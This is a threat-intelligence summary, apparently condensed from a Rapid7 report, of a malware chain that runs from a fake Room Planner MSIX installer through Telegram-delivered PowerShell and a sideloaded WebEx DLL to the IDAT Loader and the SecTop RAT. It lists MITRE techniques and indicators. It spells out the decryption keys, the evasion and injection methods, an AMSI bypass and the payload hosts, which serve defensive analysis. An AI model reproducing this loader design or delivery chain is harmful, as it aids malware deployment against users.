Keypoints
- Victim downloaded a malicious MSIX (Room_Planner-x86.msix) from a typosquatted site, which dropped and executed a PowerShell script (1.ps1).
- The initial PowerShell staged communication with a Telegram bot, sending the host IP (via icanhazip[.]com) and retrieving further PowerShell code from the bot.
- The Telegram-delivered script generated a random folder name ($JAM), downloaded and GPG-decrypted cr.tar.gpg from read-holy-quran[.]group, extracted a RAR containing run.exe and a tampered wbxtrace.dll, and started run.exe to sideload the DLL.
- The corrupted wbxtrace.dll contained the IDAT Loader, which parsed Dharna.7z for 49 44 41 54 (IDAT) offsets to derive decryption keys and reveal the final encrypted payload.
- IDAT Loader used advanced evasion/injection techniques (Process Doppelgänging, Heavenâs Gate, NtCreateSection/NtMapViewOfSection) to inject and load the final SecTop RAT into msbuild.exe.
- The chain also executed an AMSI bypass script (from Pastebin) via IEX and reflectively loaded a .NET binary downloaded as a JPG from kalpanastickerbindi[.]com/1.jpg.
- Persistence was achieved by creating a Startup .lnk pointing to run.exe and by executing the decrypted payloads from C:ProgramDatacr.
MITRE Techniques
- [T1059.001] Command and Scripting Interpreter: PowerShell â 1.ps1 is used to fingerprint the compromised machine and execute additional PowerShell scripts ( â1.ps1 is used to fingerprint compromised machine and execute additional PowerShell scriptsâ ).
- [T1106] Native API â The IDAT injector and IDAT loader are using Heavenâs Gate technique to evade detection ( âThe IDAT injector and IDAT loader are using Heavenâs Gate technique to evade detectionâ ).
- [T1204.002] User Execution: Malicious File â Initial compromise occurs when the user executes the Room_Planner-x86.msix installer ( âUser executes the binary Room_Planner-x86.msixâ ).
- [T1036.005] Masquerading: Match Legitimate Name or Location â The MSIX package impersonated the legitimate Room Planner installer to trick users ( âMalicious MSIX masquerades as legitimate Room Planner installerâ ).
- [T1140] Deobfuscate/Decode Files or Information â GPG is used to decrypt cr.tar.gpg to obtain the RAR containing the payload ( âgpg.exe used to decrypt cr.tar.gpgâ ).
- [T1574.001] Hijack Execution Flow: DLL Search Order Hijacking â run.exe loads a modified WebEx DLL (wbxtrace.dll) to execute malicious code ( ârun.exe loads a malicious wbxtrace.dllâ ).
- [T1620] Reflective Code Loading â A .NET assembly is downloaded as an image and reflectively loaded from kalpanastickerbindi[.]com/1.jpg ( âPowerShell script loads a binary hosted at kalpanastickerbindi[.]com/1.jpgâ ).
- [T1055] Process Injection â IDAT injector implements NtCreateSection + NtMapViewOfSection to inject code into other processes ( âIDAT injector implements NtCreateSection + NtMapViewOfSection Code Injection technique to inject into cmd.exe processâ ).
- [T1055.013] Process Injection: Process Doppelgänging â IDAT loader uses Process Doppelgänging to load SecTop RAT into a newly created process ( âIDAT loader implements Process Doppelgänging technique to load the SecTop RATâ ).
- [T1497.003] Virtualization/Sandbox Evasion: Time Based Evasion â Multiple stages perform execution delays to hinder sandbox analysis ( âExecution delays are performed by several stages throughout the attack flowâ ).
Indicators of Compromise
- [File] Initial installer â Room_Planner-x86.msix (SHA256: 6f350e64d4efbe8e2953b39bfee1040c8b041f6f212e794214e1836561a30c23)
- [File] Dropped script â 1.ps1 (SHA256: 928bd805b924ebe43169ad6d670acb2dfe45722e17d461ff0394852b82862d23)
- [File] Malicious DLL and payload archive â wbxtrace.dll (SHA256: 1D0DAF989CF28852342B1C0DFEE05374860E1300106FF7788BBA26D84549B845), Dharna.7z (SHA256: B7469153DC92BF5DE9BF2521D9550DF21BC4574D0D0CFC919FF26D1071C000B2)
- [Domain/URL] Hosted payloads and resources â read-holy-quran[.]group/ld/cr.tar.gpg, kalpanastickerbindi[.]com/1.jpg
- [IP] C2 communication â 91.215.85[.]66 (SecTop RAT callback)
Execution flow (technical procedure): The delivered MSIX installer dropped a PowerShell launcher (1.ps1) into the WindowsApps folder and ran it; that script used Invoke-RestMethod to fetch the host IP (icanhazip[.]com), sent the information to a Telegram bot, deleted the message, then retrieved and executed a second PowerShell stage hosted by the bot. The Telegram-stage script enumerated OS/domain/AV, generated an 8-character random name ($JAM), downloaded a GPG archive (read-holy-quran[.]group/ld/cr.tar.gpg) into %APPDATA%, decrypted it with the passphrase âriudswrkâ, saved the decrypted RAR into C:ProgramData$JAMcr, and used tar to extract its contents.
Post-extraction, the script launched run.exe (a renamed WebEx binary) which loaded a tampered WebEx DLL (wbxtrace.dll). The modified DLL contained the IDAT Loader that read Dharna.7z, searched for the PNG IDAT marker (49 44 41 54) followed by C6 A5 79 EA, used the subsequent 4 bytes (E1 4E 91 99) as a decryption key, and decrypted embedded components and a final payload (which used a 200-byte XOR key). Additional stages fetched an AMSI-bypass PowerShell script (Pastebin) executed via IEX, reflectively loaded a .NET assembly downloaded as 1.jpg (kalpanastickerbindi[.]com/1.jpg), and created persistence by placing a .lnk in the Startup folder pointing to run.exe.
Evasion and final-stage loading: The IDAT Loader employed Process Doppelgänging and Heavenâs Gate (native API calls) and used section/mapping APIs (NtCreateSection / NtMapViewOfSection) to inject into processes and load the SecTop RAT into a spawned msbuild.exe process, avoiding AV/sandbox detection. Network IOCs included the SecTop RAT callback IP 91.215.85[.]66. Rapid7 released a configuration extractor to decrypt and recover the hidden payloads and configs for analysis.